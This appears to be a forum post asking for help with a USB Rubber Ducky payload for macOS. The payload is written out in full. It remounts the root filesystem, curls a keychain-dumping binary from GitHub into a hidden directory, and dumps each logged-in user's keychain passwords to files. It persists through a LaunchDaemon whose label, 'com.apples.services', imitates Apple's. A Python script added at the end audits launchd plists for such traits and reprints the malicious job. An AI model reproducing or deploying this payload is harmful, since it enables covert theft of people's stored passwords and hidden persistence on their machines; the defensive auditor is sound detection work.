Posts posted by IsaiahJTurner

  1. I was trying to take advantage of a project called KeychainDump that extracts OS X Keychain decryption keys from RAM to dump passwords but am having an issue. First off, the source can be found on https://github.com/IsaiahJTurner/duckdump. I compiled the keychaindump binary myself but feel free to compile it on your own if you don't trust mine. The issue I am having is that OS X launchd never seems to run. If I run the script manually, it works, but I want it to run automatically as soon as the user logs in. Any help?

    Partially Inspired By: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---OSX-Root-Backdoor

    REM Isaiah Turner
    REM This tool will automatically dump all passwords stored in the keychain to a file on the desktop upon login.
    REM Please do not use this for evil, this is for educational purposes only.
    REM http://isaiahjturner.com
    DELAY 1000
    STRING mount -uw /
    ENTER
    DELAY 2000
    STRING mkdir /Library/.hidden
    ENTER
    DELAY 200
    
    STRING echo '#!/bin/sh
    ENTER
    STRING curl -o /Library/.hidden/keychaindump 'https://raw.githubusercontent.com/IsaiahJTurner/keychaindump/master/keychaindump'
    ENTER
    STRING chmod +x /Library/.hidden/keychaindump
    ENTER
    STRING w -h | sort -u -t'"' '"' -k1,1 | while read user etc
    ENTER
    STRING do
    ENTER
    STRING homedir=$(dscl . -read /Users/$user NFSHomeDirectory | cut -d'"' '"' -f2)
    ENTER
    STRING /Library/.hidden/keychaindump $homedir/Library/Keychains/login.keychain > $homedir/Desktop/$user.login.keychain.txt
    ENTER
    STRING done' > /Library/.hidden/dump.sh
    ENTER
    DELAY 500
    
    
    STRING chmod +x /Library/.hidden/dump.sh
    ENTER
    DELAY 200
    
    
    STRING mkdir /Library/LaunchDaemons
    ENTER
    DELAY 200
    
    
    STRING echo '<plist version="1.0">
    ENTER
    STRING <dict>
    ENTER
    STRING <key>Label</key>
    ENTER
    STRING <string>com.apples.services</string>
    ENTER
    STRING <key>ProgramArguments</key>
    ENTER
    STRING <array>
    ENTER
    STRING <string>/bin/sh</string>
    ENTER
    STRING <string>/Library/.hidden/dump.sh</string>
    ENTER
    STRING </array>
    ENTER
    STRING <key>RunAtLoad</key>
    ENTER
    STRING <true/>
    ENTER
    STRING <key>AbandonProcessGroup</key>
    ENTER
    STRING <true/>
    ENTER
    STRING </dict>
    ENTER
    STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist
    ENTER
    DELAY 500
    
    
    STRING chmod 644 /Library/LaunchDaemons/com.apples.services.plist
    ENTER
    DELAY 200
    
    
    STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist
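
For defenders, the launchd job in the post above has several traits that can be checked when auditing `/Library/LaunchDaemons`. The following is an added example, not part of the original post or the linked projects; the function names and the three heuristics (dot-directory path, shell running a script, label that imitates the `com.apple.` namespace) are assumptions chosen for illustration.

```python
import plistlib
from pathlib import Path, PurePosixPath
from xml.parsers.expat import ExpatError

SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh"}

def has_hidden_component(path):
    """True if any directory or file name in an absolute path starts with a dot."""
    return any(part.startswith(".") for part in PurePosixPath(path).parts[1:])

def audit_launchd_job(plist_bytes):
    """Return a list of findings for one launchd job definition (XML or binary plist)."""
    job = plistlib.loads(plist_bytes)
    if not isinstance(job, dict):
        return ["plist root is not a dictionary"]
    args = job.get("ProgramArguments") or [job.get("Program", "")]
    findings = [f"path in hidden directory: {a}" for a in args
                if a.startswith("/") and has_hidden_component(a)]
    if len(args) > 1 and args[0] in SHELLS:
        findings.append(f"shell interpreter runs script: {args[1]}")
    label = job.get("Label", "")
    if label.startswith("com.apple") and not label.startswith("com.apple."):
        findings.append(f"label imitates Apple namespace: {label}")
    if findings and job.get("RunAtLoad"):
        findings.append("RunAtLoad set: job starts as soon as launchd loads it")
    return findings

def audit_directory(directory="/Library/LaunchDaemons"):
    """Audit every plist in a launchd directory; returns {path: findings}."""
    report = {}
    for plist in sorted(Path(directory).glob("*.plist")):
        try:
            findings = audit_launchd_job(plist.read_bytes())
        except (plistlib.InvalidFileException, ExpatError, OSError) as exc:
            findings = [f"unreadable plist: {exc}"]
        if findings:
            report[str(plist)] = findings
    return report

# Job definition reassembled from the STRING lines of the post above.
POSTED_JOB = b"""<plist version="1.0">
<dict>
<key>Label</key><string>com.apples.services</string>
<key>ProgramArguments</key>
<array><string>/bin/sh</string><string>/Library/.hidden/dump.sh</string></array>
<key>RunAtLoad</key><true/>
<key>AbandonProcessGroup</key><true/>
</dict>
</plist>"""

if __name__ == "__main__":
    for finding in audit_launchd_job(POSTED_JOB):
        print(finding)
```

Running `audit_directory()` on a host covers the system-wide daemon directory; pass `/Library/LaunchAgents` or a user's `~/Library/LaunchAgents` to cover the other launchd locations.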
    